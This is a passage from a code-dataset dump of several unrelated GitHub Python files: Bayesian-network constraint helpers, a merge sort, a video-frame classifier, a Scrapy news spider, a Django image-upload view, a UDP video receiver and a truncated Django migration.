qglopm.Visualizer2D({})\nvis2d.show()\ngraph_layer=vis2d.addLayer(\"graph\",{\"type\":\"geojson\",\"content\":geojson})\nchild_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\nvis2d.setHomePOS([child_center.y,child_center.x,0])\nvis2d.goHome()\n\nwhile True:\n qapp.processEvents()\n time.sleep(0.01)\n\n","repo_name":"zdzhaoyong/highstitch","sub_path":"python/matching_graph.py","file_name":"matching_graph.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"38517037669","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 28 21:03:05 2020\n\n@author: zijun.cui\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.utils.extmath import cartesian\nfrom scipy.optimize import fsolve\nfrom random import seed\nfrom random import random\nfrom random import randint\n\ndef count_weights(states_arr, dag):\n num_nodes = len(states_arr)\n num_weights = np.zeros(num_nodes)\n for i in range(num_nodes):\n num_states = states_arr[i]\n if num_states == 2:\n num_weights[i] = sum(dag[:,i]) + 1\n else:\n num_weights[i] = num_states*(sum(dag[:,i]) + 1)\n \n return np.sum(num_weights), num_weights\n\ndef get_constraints(load_constraints): #multi-states nodes \n Constraints = []\n num_constraints = load_constraints.shape[0]\n\n num_strict = 0\n for i in range(num_constraints):\n # target set\n orig_set = load_constraints[i,0]\n num_t = orig_set.shape[0]\n t_condi = []\n for j in range(num_t):\n t_condi.append([orig_set[j][0], orig_set[j][1]])\n \n # condition set\n orig_set = load_constraints[i,1]\n num_c = orig_set.shape[0]\n c_condi = []\n for j in range(num_c):\n if orig_set[j][0] == 18:\n c_condi.append([0, orig_set[j][1]-1]) # node 0 for expression with expression 0-5\n else:\n c_condi.append([orig_set[j][0], orig_set[j][1]])\n \n # \n state = load_constraints[i,2][0]\n if state == 'strict bigger' or state == 'strict bigger-product':\n num_strict = num_strict + 1\n \n elif state == 'strict smaller' or state == 'strict smaller-product':\n num_strict = num_strict + 1\n #\n const = load_constraints[i,3]\n if const.shape[1] == 1: # value as constraint\n prob = load_constraints[i,3]\n Constraints.append([t_condi,c_condi,state,prob[0,0]])\n else:\n num_cc = const.shape[0]\n cc_condi = []\n for j in range(num_cc):\n cc_condi.append([const[j][0], const[j][1]])\n Constraints.append([t_condi, c_condi, state, cc_condi])\n \n \n return Constraints, num_strict\n\n\ndef arrange_config_v2(config, DAG, states_arr):\n num_nodes = np.shape(DAG)[0]\n _, num_weights = count_weights(states_arr, DAG)\n num_config = np.shape(config)[0]\n \n num_weights = num_weights.astype(int)\n states_arr = states_arr.astype(int)\n \n parent_config = np.zeros([np.sum(states_arr), np.sum(num_weights), num_config])\n DAG = DAG + np.identity(num_nodes)\n \n for i in range(num_nodes):\n w_start_idx = np.sum(num_weights[0:i])\n w_end_idx = np.sum(num_weights[0:i+1])\n parent_set = np.nonzero(DAG[:,i])[0]\n if i == 0:\n pos = 0\n else:\n pos = np.sum(states_arr[0:i])\n \n if len(parent_set) != 0:\n if states_arr[i] == 2:\n for j in range(num_config):\n# parent_config[pos+1, w_start_idx, j] = 1\n temp = config[j, parent_set]\n temp[i] = 0\n parent_config[pos+1, w_start_idx:w_end_idx, j] = temp #config[j, parent_set]\n else: # multi-states\n for j in range(num_config):\n temp = config[j, parent_set]\n temp[i] = 0\n ssize = (num_weights[i]/states_arr[i]).astype(int)\n for k in range(states_arr[i]):\n sidx = w_start_idx + k*ssize\n eidx = w_start_idx + (k+1)*ssize\n parent_config[pos+k, sidx:eidx, j] = temp\n else:\n if states_arr[i] == 2:\n for j in range(num_config):\n parent_config[pos+1, w_start_idx:w_end_idx, j] = 0 #node itself\n else:\n for j in range(num_config):\n for k in range(states_arr[i]):\n sidx = w_start_idx + k\n eidx = w_start_idx + k + 1\n parent_config[pos+k, sidx:eidx, j] = 0\n \n return parent_config\n \ndef complete_config(incomplete_config, states_arr):\n num_nodes = len(states_arr)\n \n idx = np.where(np.array(incomplete_config)==-999)[0]\n idx_complete = np.where(np.array(incomplete_config)!=-999)[0]\n \n num = len(idx)\n arr = []\n for i in range(num):\n arr.append(np.arange(states_arr[idx[i]]))\n \n config = cartesian(arr)\n num_config = np.shape(config)[0]\n \n complete_config = np.zeros([num_config, num_nodes])\n complete_config[:, idx] = config\n incomplete_config = np.array(incomplete_config)\n complete_config[:, idx_complete] = np.tile(incomplete_config[idx_complete], (num_config,1))\n \n return complete_config\n\n\ndef list_configuration(states_arr, dag):\n num_nodes = len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config = complete_config(configs, states_arr)\n config_p = arrange_config_v2(config, dag, states_arr)\n \n config = one_hot_config(config, states_arr)\n \n return config, config_p\n\ndef one_hot_config(config, states_arr):\n num_config, num_nodes = np.shape(config)\n states_cum = np.cumsum(states_arr)\n states_cum = np.insert(states_cum, 0, 0)\n num_states = np.sum(states_arr)\n num_states = num_states.astype(int)\n \n onehot_config = np.zeros([num_config, num_states])\n for i in range(num_config):\n for j in range(num_nodes):\n sidx = states_cum[j]\n ss = config[i,j]\n onehot_config[i, sidx.astype(int) + ss.astype(int)] = 1\n \n return onehot_config\n\n\ndef read_condition(constraint):\n num_condition = len(constraint)\n idx = []\n config = []\n for i in range(num_condition):\n idx.append(constraint[i][0])\n config.append(constraint[i][1])\n \n return idx, config\n\n\ndef sparse_constraint(Constraint, states_arr):\n num_constraints = len(Constraint)\n num_nodes = len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config_all = complete_config(configs, states_arr)\n num_config = config_all.shape[0]\n \n strict_idx = 0\n strict_const = []\n inequal_idx = 0\n inequal_const = []\n equal_idx = 0\n equal_const = []\n\n \n for i in np.arange(num_constraints):\n constraint = Constraint[i]\n # get target set and condition set\n target_idx, target_config = read_condition(constraint[0])\n condition_idx, condition_config = read_condition(constraint[1])\n \n # numerator\n mask_N = np.zeros([num_config, 1])\n mask_N[np.where((config_all[:,target_idx] == target_config) & \\\n (config_all[:,condition_idx] == condition_config))[0]] = 1\n\n # denominator\n mask_D = np.zeros([num_config, 1])\n mask_D[np.where(config_all[:, condition_idx] == condition_config)] = 1\n \n if constraint[2] == 'bigger':\n if inequal_idx == 0:\n inequal_numer = -mask_N\n inequal_denom = mask_D\n else:\n inequal_numer = np.concatenate((inequal_numer, -mask_N), axis = 1)\n inequal_denom = np.concatenate((inequal_denom, mask_D), axis = 1) \n inequal_const.append(-constraint[3])\n inequal_idx = inequal_idx + 1\n \n elif constraint[2] == 'smaller':\n if inequal_idx == 0:\n inequal_numer = mask_N\n inequal_denom = mask_D\n else:\n inequal_numer = np.concatenate((inequal_numer, mask_N), axis = 1)\n inequal_denom = np.concatenate((inequal_denom, mask_D), axis = 1) \n inequal_const.append(constraint[3])\n inequal_idx = inequal_idx + 1\n \n elif constraint[2] == 'strict bigger':\n if strict_idx == 0:\n strict_numer = -mask_N\n strict_denom = mask_D\n else:\n strict_numer = np.concatenate((strict_numer, -mask_N), axis = 1)\n strict_denom = np.concatenate((strict_denom, mask_D), axis = 1) \n strict_const.append(-constraint[3])\n strict_idx = strict_idx + 1\n \n elif constraint[2] == 'strict smaller':\n if strict_idx == 0:\n strict_numer = mask_N\n strict_denom = mask_D\n else:\n strict_numer = np.concatenate((strict_numer, mask_N), axis = 1)\n strict_denom = np.concatenate((strict_denom, mask_D), axis = 1) \n strict_const.append(constraint[3]) \n strict_idx = strict_idx + 1\n \n elif constraint[2] == 'equal':\n if equal_idx == 0:\n equal_numer = mask_N\n equal_denom = mask_D\n else:\n equal_numer = np.concatenate((equal_numer, mask_N), axis = 1)\n equal_denom = np.concatenate((equal_denom, mask_D), axis = 1) \n equal_const.append(constraint[3]) \n equal_idx = equal_idx + 1\n \n return strict_numer, strict_denom, strict_const, inequal_numer, inequal_denom, inequal_const,\\\n equal_numer, equal_denom, equal_const\n\n\n\ndef sparse_constraint_v2(Constraint, states_arr):\n num_constraints = len(Constraint)\n num_nodes = len(states_arr)\n \n configs = -999*np.ones(num_nodes)\n config_all = complete_config(configs, states_arr)\n num_config = config_all.shape[0]\n \n strict2_idx = 0\n strict3_idx = 0\n\n \n for i in np.arange(num_constraints):\n constraint = Constraint[i]\n # get target set and condition set\n target_idx, target_config = read_condition(constraint[0])\n condition_idx, condition_config = read_condition(constraint[1])\n\n # numerator\n mask_N = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = target_idx + condition_idx\n temp2 = target_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_N[idx] = 1\n else:\n idx = (config_all[:,target_idx] == target_config).all(axis=1).nonzero()[0]\n mask_N[idx] = 1\n \n # denominator\n mask_D = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n idx = (config_all[:, condition_idx] == condition_config).all(axis=1).nonzero()[0]\n mask_D[idx] = 1\n \n \n if constraint[2] == 'strict bigger':\n \n const_idx, const_config = read_condition(constraint[3])\n # numerator for constraint\n mask_cN = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = const_idx + condition_idx\n temp2 = const_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n else:\n idx = (config_all[:,const_idx] == const_config).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n \n \n if strict2_idx == 0:\n strict_numer2 = -mask_N\n strict_denom2 = mask_D\n strict_const_numer2 = -mask_cN\n else:\n strict_numer2 = np.concatenate((strict_numer2, -mask_N), axis = 1)\n strict_denom2 = np.concatenate((strict_denom2, mask_D), axis = 1) \n strict_const_numer2 = np.concatenate((strict_const_numer2, -mask_cN), axis = 1)\n strict2_idx = strict2_idx + 1\n \n elif constraint[2] == 'strict smaller':\n \n const_idx, const_config = read_condition(constraint[3])\n # numerator for constraint\n mask_cN = np.zeros([num_config, 1])\n if len(condition_idx) != 0:\n temp1 = const_idx + condition_idx\n temp2 = const_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n else:\n idx = (config_all[:,const_idx] == const_config).all(axis=1).nonzero()[0]\n mask_cN[idx] = 1\n \n if strict2_idx == 0:\n strict_numer2 = mask_N\n strict_denom2 = mask_D\n strict_const_numer2 = mask_cN\n else:\n strict_numer2 = np.concatenate((strict_numer2, mask_N), axis = 1)\n strict_denom2 = np.concatenate((strict_denom2, mask_D), axis = 1) \n strict_const_numer2 = np.concatenate((strict_const_numer2, mask_cN), axis = 1)\n strict2_idx = strict2_idx + 1\n \n elif constraint[2] == 'strict bigger-product':\n \n const1_idx, const1_config = read_condition([constraint[3][0]])\n const2_idx, const2_config = read_condition([constraint[3][1]])\n # numerator for constraint\n mask_cN1 = np.zeros([num_config, 1])\n temp1 = const1_idx + condition_idx\n temp2 = const1_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN1[idx] = 1\n \n mask_cN2 = np.zeros([num_config, 1])\n temp1 = const2_idx + condition_idx\n temp2 = const2_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN2[idx] = 1\n \n if strict3_idx == 0:\n strict_numer3 = -mask_N\n strict_denom3 = mask_D\n strict_const_numer31 = -mask_cN1\n strict_const_numer32 = mask_cN2\n else:\n strict_numer3 = np.concatenate((strict_numer3, -mask_N), axis = 1)\n strict_denom3 = np.concatenate((strict_denom3, mask_D), axis = 1) \n strict_const_numer31 = np.concatenate((strict_const_numer31, -mask_cN1), axis = 1)\n strict_const_numer32 = np.concatenate((strict_const_numer32, mask_cN2), axis = 1)\n strict3_idx = strict3_idx + 1\n \n elif constraint[2] == 'strict smaller-product':\n \n const1_idx, const1_config = read_condition([constraint[3][0]])\n const2_idx, const2_config = read_condition([constraint[3][1]])\n # numerator for constraint\n mask_cN1 = np.zeros([num_config, 1])\n temp1 = const1_idx + condition_idx\n temp2 = const1_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN1[idx] = 1\n \n mask_cN2 = np.zeros([num_config, 1])\n temp1 = const2_idx + condition_idx\n temp2 = const2_config + condition_config\n idx = (config_all[:,temp1] == temp2).all(axis=1).nonzero()[0]\n mask_cN2[idx] = 1\n \n if strict3_idx == 0:\n strict_numer3 = mask_N\n strict_denom3 = mask_D\n strict_const_numer31 = mask_cN1\n strict_const_numer32 = mask_cN2\n else:\n strict_numer3 = np.concatenate((strict_numer3, mask_N), axis = 1)\n strict_denom3 = np.concatenate((strict_denom3, mask_D), axis = 1) \n strict_const_numer31 = np.concatenate((strict_const_numer31, mask_cN1), axis = 1)\n strict_const_numer32 = np.concatenate((strict_const_numer32, mask_cN2), axis = 1)\n strict3_idx = strict3_idx + 1\n \n return strict_numer2, strict_denom2, strict_const_numer2, \\\n strict_numer3, strict_denom3, strict_const_numer31, strict_const_numer32\\\n \n \n\ndef update_slack(value, init):\n num_variable = len(init)\n update_value = value.copy()\n for i in np.arange(num_variable):\n func = lambda x: (value[i]+np.math.exp(x))*np.math.exp(x)/((value[i]+np.math.exp(x))**2+1) - x \n update_value[i] = fsolve(func, init[i])\n \n return update_value\n\n\n\ndef check_satisfaction(strict_p, inequal_p, equal_p, strict_const_, inequal_const_, equal_const_):\n percent_strict = sum((strict_p-strict_const_)<0)/len(strict_p)\n percent_inequal = sum((inequal_p-inequal_const_)<0)/len(inequal_p)\n percent_equal = sum(abs(equal_p-equal_const_)<0.1)/len(equal_p)\n percent_total = (sum((strict_p-strict_const_)<0)+sum((inequal_p-inequal_const_)<0)+\\\n sum(abs(equal_p-equal_const_)<0.1))/(len(strict_p)+len(inequal_p)+len(equal_p))\n print('total = %f, strict = %f, inequal = %f, equal=%f'%(percent_total, percent_strict, percent_inequal, percent_equal))\n \n'''tf'''\n\ndef WeightsToAdjacency(weights_r, states_cum):\n \n weights_pos = tf.nn.relu(weights_r)\n weights_neg = tf.nn.relu(-weights_r)\n weights = weights_pos + weights_neg\n# weights = tf.math.abs(weights_r)\n weights = tf.math.square(weights_r)\n \n row1 = tf.math.reduce_sum(weights_r[states_cum[0]:states_cum[1], :], axis=0, keepdims=True) \n row2 = tf.math.reduce_sum(weights_r[states_cum[1]:states_cum[2], :], axis=0, keepdims=True)\n row3 = tf.math.reduce_sum(weights_r[states_cum[2]:states_cum[3], :], axis=0, keepdims=True)\n row4 = tf.math.reduce_sum(weights_r[states_cum[3]:states_cum[4], :], axis=0, keepdims=True)\n row5 = tf.math.reduce_sum(weights_r[states_cum[4]:states_cum[5], :], axis=0, keepdims=True)\n row6 = tf.math.reduce_sum(weights_r[states_cum[5]:states_cum[6], :], axis=0, keepdims=True)\n row7 = tf.math.reduce_sum(weights_r[states_cum[6]:states_cum[7], :], axis=0, keepdims=True)\n row8 = tf.math.reduce_sum(weights_r[states_cum[7]:states_cum[8], :], axis=0, keepdims=True)\n row9 = tf.math.reduce_sum(weights_r[states_cum[8]:states_cum[9], :], axis=0, keepdims=True)\n \n adjacency = tf.concat([row1, row2, row3, row4, row5, row6, row7, row8, row9], axis=0) #[num_states, num_config]\n \n return adjacency\n\n\ndef DAGconstraint(adjacency):\n '''\n (Zheng et al 2019)\n '''\n num_nodes = tf.shape(adjacency)[0]\n num_nodes = tf.dtypes.cast(num_nodes, tf.float32)\n E = tf.linalg.expm(adjacency*adjacency)\n h = tf.linalg.trace(E) - num_nodes \n\n return h\n\n\ndef SPARSEconstraint_l1(adjacency):\n adj_ = adjacency\n \n return tf.math.reduce_sum(adj_)\n\ndef joint_marg_prob(states_cum, weights, bias, config, mask, parent_config): \n num_states = tf.shape(parent_config)[0]\n num_config = tf.shape(config)[1]\n \n weight_reshape = tf.tile(tf.expand_dims(weights, 2), [num_states, 1, num_config])\n bias_reshape = tf.tile(bias, [1, num_config])\n \n val = tf.reduce_sum(tf.math.multiply(parent_config, weight_reshape), 1) + tf.math.multiply(bias_reshape, mask)\n \n dist1 = tf.nn.softmax(val[states_cum[0]:states_cum[1],:], axis=0)\n dist2 = tf.nn.softmax(val[states_cum[1]:states_cum[2],:], axis=0)\n dist3 = tf.nn.softmax(val[states_cum[2]:states_cum[3],:], axis=0)\n dist4 = tf.nn.softmax(val[states_cum[3]:states_cum[4],:], axis=0)\n dist5 = tf.nn.softmax(val[states_cum[4]:states_cum[5],:], axis=0)\n dist6 = tf.nn.softmax(val[states_cum[5]:states_cum[6],:], axis=0)\n dist7 = tf.nn.softmax(val[states_cum[6]:states_cum[7],:], axis=0)\n dist8 = tf.nn.softmax(val[states_cum[7]:states_cum[8],:], axis=0)\n dist9 = tf.nn.softmax(val[states_cum[8]:states_cum[9],:], axis=0) \n\n distribution = tf.concat([dist1, dist2, dist3, dist4, dist5, dist6, dist7, dist8, dist9], axis=0) #[num_states, num_config]\n\n prob_arr = tf.math.pow(distribution, config)\n prob_arr2 = tf.math.reduce_prod(prob_arr, 0) # joint probability for each configuration\n prob = tf.math.reduce_sum(distribution) # by lisiting all joint configurations, prob should always be 1 if DAG\n \n return prob, prob_arr2\n","repo_name":"zijunjkl/NeurIPS2020","sub_path":"BNwithConstraints/helper_function_new.py","file_name":"helper_function_new.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39533082853","text":"def merge_sort(items):\n \n return divide(items, glue = merge)\n\n \ndef divide(items, glue):\n\n # conquer step - recursive base case\n if len(items) < 2:\n return items\n\n mid = len(items) // 2\n\n left = divide(items[0:mid], glue)\n\n right = divide(items[mid:], glue)\n\n # \"glue\" it all back together\n return glue(left, right)\n\n\ndef merge(left, right):\n\n result = []\n\n while left or right:\n\n if not left:\n result += right\n break\n \n if not right:\n result += left\n break\n\n # To ponder: what, if any, are the big O implications\n # of removing from front of collection?\n # Are there other data structures that may be more efficient?\n if left[0] < right[0]:\n result.append(left.pop(0))\n else:\n result.append(right.pop(0))\n\n return result\n\n \n\n","repo_name":"CodeCrew-CodeSchool/Alumni-Challenges","sub_path":"data_structures_and_algorithms/Code_401/class-27/solutions/python/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3036109825","text":"def ApplyModelsToVideo(PathSubFolderToAnalyze):\r\n import os\r\n ################################\r\n # Lister les modèles disponibles\r\n ListOfModels = []\r\n # Parcours des fichiers et dossiers dans le chemin spécifié\r\n for element in os.listdir(PathSubFolderToAnalyze):\r\n chemin_absolu = os.path.join(PathSubFolderToAnalyze, element)\r\n # Vérification si l'élément est un fichier se terminant par l'extension '.h5'\r\n if os.path.isfile(chemin_absolu) and element.lower().endswith('.h5'):\r\n ListOfModels.append(chemin_absolu)\r\n # Affichage des fichiers trouvés\r\n for model in ListOfModels:\r\n print(model)\r\n print(ListOfModels)\r\n ###########################\r\n # Lister les fichiers vidéo\r\n ListOfVideos = []\r\n # Parcours des fichiers et dossiers dans le chemin spécifié\r\n for element in os.listdir(PathSubFolderToAnalyze):\r\n chemin_absolu = os.path.join(PathSubFolderToAnalyze, element)\r\n # Vérification si l'élément est un fichier vidéo se terminant par les extensions '.mts' ou '.mp4'\r\n if os.path.isfile(chemin_absolu) and (element.lower().endswith('.mts') or element.lower().endswith('.mp4')):\r\n ListOfVideos.append(chemin_absolu)\r\n for element in ListOfVideos:\r\n if element.lower().endswith('.body.mp4'):\r\n ListOfVideos = [element]\r\n print(ListOfVideos)\r\n ##################################################################\r\n # Pour chaque modèle, appliquer pour chaque vidéo, et pour chaque image de la vidéo, le modèle\r\n import cv2\r\n from tensorflow import keras\r\n from tensorflow.keras.preprocessing import image\r\n from tensorflow.keras.optimizers import RMSprop\r\n import tensorflow as tf\r\n import numpy as np\r\n #\r\n # Vérification de la disponibilité du GPU pour TensorFlow\r\n from tensorflow.python.client import device_lib# Vérifier la disponibilité des GPU\r\n gpu_devices = [device.name for device in device_lib.list_local_devices() if device.device_type == \"GPU\"]\r\n print(gpu_devices)\r\n if not gpu_devices:\r\n print(\"Aucun GPU disponible. Veuillez vous assurer que CUDA et les pilotes NVIDIA sont correctement installés.\")\r\n XPUs = [\"/CPU:0\"]\r\n else:\r\n XPUs = [\"/GPU:0\"]\r\n for XPU in XPUs:\r\n with tf.device(XPU):\r\n #\r\n for Model in ListOfModels:\r\n model = keras.models.load_model(Model)# Chargement du modèle\r\n input_shape = model.input_shape[1:3]\r\n for PathVideo in ListOfVideos:\r\n # Ecriture des résultats dans un .csv\r\n import csv\r\n ResultPath = os.path.join(PathSubFolderToAnalyze, str(os.path.basename(Model)) + 'Ethogram.csv')# Chemin du fichier CSV\r\n # Ouvrir le fichier CSV en mode append (ajout) ou write (écriture)\r\n with open(ResultPath, 'a', newline='') as file:\r\n writer = csv.writer(file, delimiter=';')# Écrire la ligne dans le fichier CSV\r\n #############################\r\n # Sélection de la vidéo\r\n video = cv2.VideoCapture(PathVideo)\r\n # Vérification si la vidéo est ouverte correctement\r\n if not video.isOpened():\r\n print(\"Impossible d'ouvrir la vidéo.\")\r\n exit()\r\n # Boucle pour parcourir chaque frame de la vidéo\r\n frame_count = 1\r\n while True:\r\n # Lecture de la frame suivante\r\n ret, frame = video.read()\r\n # Vérification si la lecture de la frame a réussi\r\n if not ret:\r\n break\r\n ##########################################\r\n # Appliquer chaque modèle sur chaque frame\r\n threshold=0.5 # Seuil de sensibilité de détection | Seuil = 0.5 | Si diminué, alors + tolérant.\r\n #cote, cote2, canaux = frame.shape\r\n #\r\n img = np.array(frame, dtype=np.float32) # Convertir l'image OpenCV en tableau numpy\r\n img = cv2.resize(img, input_shape)\r\n img = np.expand_dims(img, axis=0) # Ajouter une dimension pour correspondre aux attentes du modèle\r\n val=model.predict(img)\r\n if val < threshold:\r\n writer.writerow([str(frame_count), 'POS'])# Écrire la ligne résultat\r\n else:\r\n writer.writerow([str(frame_count), 'NEG'])# Écrire la ligne résultat\r\n # Incrémentation du compteur de frame\r\n frame_count += 1\r\n # Vérification si la touche 'q' est pressée pour quitter la boucle\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n # Libération des ressources\r\n video.release()\r\n cv2.destroyAllWindows()\r\n ################################\r\n # Plot de l'éthogramme résultant\r\n import matplotlib.pyplot as plt\r\n # Lire le fichier CSV et extraire les valeurs de colonne 1 et les étiquettes de colonne 2\r\n valeurs_colonne1 = []\r\n etiquettes_colonne2 = []\r\n with open(ResultPath, 'r') as file:\r\n reader = csv.reader(file, delimiter=';')\r\n for row in reader:\r\n valeurs_colonne1.append(int(row[0]))\r\n etiquettes_colonne2.append(row[1])\r\n # Créer une matrice pour représenter le heatmap\r\n heatmap = np.zeros((1, max(valeurs_colonne1)))\r\n for valeur, etiquette in zip(valeurs_colonne1, etiquettes_colonne2):\r\n if etiquette == 'POS':\r\n heatmap[0, valeur-1] = 1\r\n # Créer le heatmap\r\n plt.imshow(heatmap, cmap='Greens_r', aspect='auto')\r\n # Personnaliser le graphique\r\n plt.xlabel('Frame')\r\n plt.title(str(Model))\r\n plt.xticks(range(len(valeurs_colonne1)), valeurs_colonne1, rotation='vertical')\r\n plt.yticks([])\r\n # Afficher le graphique\r\n plt.show()","repo_name":"beesixtwelvian/RodentPainTracker","sub_path":"RodentPainTracker/ApplyModelsToVideo/ApplyModelsToVideo.py","file_name":"ApplyModelsToVideo.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39553594042","text":"import scrapy\n\nfrom scrapy.loader import ItemLoader\n\nfrom ..items import OnecommunitybankItem\nfrom itemloaders.processors import TakeFirst\n\nbase = 'https://www.onecommunity.bank/category/news/page/{}/'\n\nclass OnecommunitybankSpider(scrapy.Spider):\n\tname = 'onecommunitybank'\n\tpage = 1\n\tstart_urls = [base.format(page)]\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//a[@class=\"btn\"]/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tif post_links:\n\t\t\tself.page += 1\n\t\t\tyield response.follow(base.format(self.page), self.parse)\n\n\tdef parse_post(self, response):\n\t\ttitle = response.xpath('//h1/text()').get()\n\t\tdescription = response.xpath('//div[@class=\"post-body tight-text-flex-container\"]//text()[normalize-space()]').getall()\n\t\tdescription = [p.strip() for p in description]\n\t\tdescription = ' '.join(description).strip()\n\t\tdate = response.xpath('//div[@class=\"post-date\"]/text()').get()\n\n\t\titem = ItemLoader(item=OnecommunitybankItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\t\titem.add_value('title', title)\n\t\titem.add_value('description', description)\n\t\titem.add_value('date', date)\n\n\t\treturn item.load_item()\n","repo_name":"hristo-grudev/onecommunitybank","sub_path":"onecommunitybank/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24411237188","text":"import base64\nimport json\nimport os\nimport uuid\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .tasks import process_image\n\n\n@csrf_exempt\ndef exec_script(request):\n res = {}\n if request.method == 'POST':\n body_json = json.loads(request.body)\n clothing = body_json['clothing']\n img_data = body_json['image'] # base64 raw data (without prefix data:image/...)\n wd = os.getcwd() + '/keypoints/code'\n\n # Generate unique uuid\n img_id = uuid.uuid4()\n\n with open(wd + '/tmp'+str(img_id)+'.jpg', 'wb') as f:\n f.write(base64.b64decode(img_data)) # Valid only for jpg data\n f.close()\n\n # Run AI script\n res = process_image.delay('/tmp'+str(img_id)+'.jpg', clothing)\n\n return JsonResponse({'task_id': res.id})\n\ndef task_status(request, task_id):\n res = process_image.AsyncResult(task_id)\n return JsonResponse({'status': res.status, 'result': res.result})\n","repo_name":"2022-2023-INFO5-FitSize/FitSize---Backend","sub_path":"keypoints/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13090538872","text":"import socket\nimport numpy as np\nimport cv2 as cv\n\nrecevier = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n# socket 통신준비\nrecevier.bind(('192.168.16.24', 7778))\n# 바인딩\n\n# 480 * 640 * 3 / 20 = 46080\nperlength = int( (480 * 640 * 3) / 20) # packet size\nreallength = perlength + 1\n\narray = list()\nwhile True:\n message, address= recevier.recvfrom(reallength)\n # 통신 사이즈 설정\n\n str = message[1:46081]\n num_array = b''\n\n array[message[0]] = str\n\n if message[0] == 19:\n for i in range(20):\n num_array += array[i]\n frame = np.fromstring(num_array, dtype=np.uint8)\n frame = frame.reshape(480,640,3)\n cv.imshow('video receiver',frame)\n\n pass","repo_name":"jyhh1992/test_opencv","sub_path":"video_receiver.py","file_name":"video_receiver.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10064439512","text":"from __future__ import unicode_literals\n\nimport django.contrib.postgres.fields\nimport django.contrib.postgres.fields.jsonb\nimport django.contrib.postgres.fields.ranges\nimport django.core.serializers.json\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\nimport model_utils.fields\nimport panels.models.entity\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"panels\", \"0036_auto_20180213_1322\")]\n\n operations = [\n migrations.CreateModel(\n name=\"STR\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\n \"created\",\n model_utils.fields.AutoCreatedField(\n default=django.utils.timezone.now,\n editable=False,\n verbose_name=\"created\",\n ),\n ),\n (\n \"modified\",\n model_utils.fields.AutoLastModifiedField(\n default=django.utils.timezone.now,\n editable=False,\n verbose_name=\"modified\",\n ),\n ),\n (\"name\", models.CharField(max_length=128)),\n (\n \"position\",\n models.CharField(help_text=\"Chr:Start Position\", max_length=32),\n ),\n (\n \"normal_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(\n blank=True, null=True\n ),\n ),\n (\n \"prepathogenic_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(\n blank=True, null=True\n ),\n ),\n (\n \"pathogenic_range\",\n django.contrib.postgres.fields.ranges.IntegerRangeField(),\n ),\n (\n \"gene\",\n django.contrib.postgres.fields.jsonb.JSONField(\n encoder=django.core.serializers.json.DjangoJSONEncoder\n ),\n ),\n (\n \"moi\",\n models.CharField(\n choices=[\n (\"\", \"Provide a mode of inheritance\"),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, NOT imprinted\",\n \"MONOALLELIC, autosomal or pseudoautosomal, NOT imprinted\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, maternally imprinted (paternal allele expressed)\",\n \"MONOALLELIC, autosomal or pseudoautosomal, maternally imprinted (paternal allele expressed)\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, paternally imprinted (maternal allele expressed)\",\n \"MONOALLELIC, autosomal or pseudoautosomal, paternally imprinted (maternal allele expressed)\",\n ),\n (\n \"MONOALLELIC, autosomal or pseudoautosomal, imprinted status unknown\",\n \"MONOALLELIC, autosomal or pseudoautosomal, imprinted status unknown\",\n ),\n (\n \"BIALLELIC, autosomal or pseudoautosomal\",\n \"BIALLELIC, autosomal or pseudoautosomal\",\n ),\n (\n \"BOTH monoallelic and biallelic, autosomal or pseudoautosomal\",\n \"BOTH monoallelic and biallelic, autosomal or 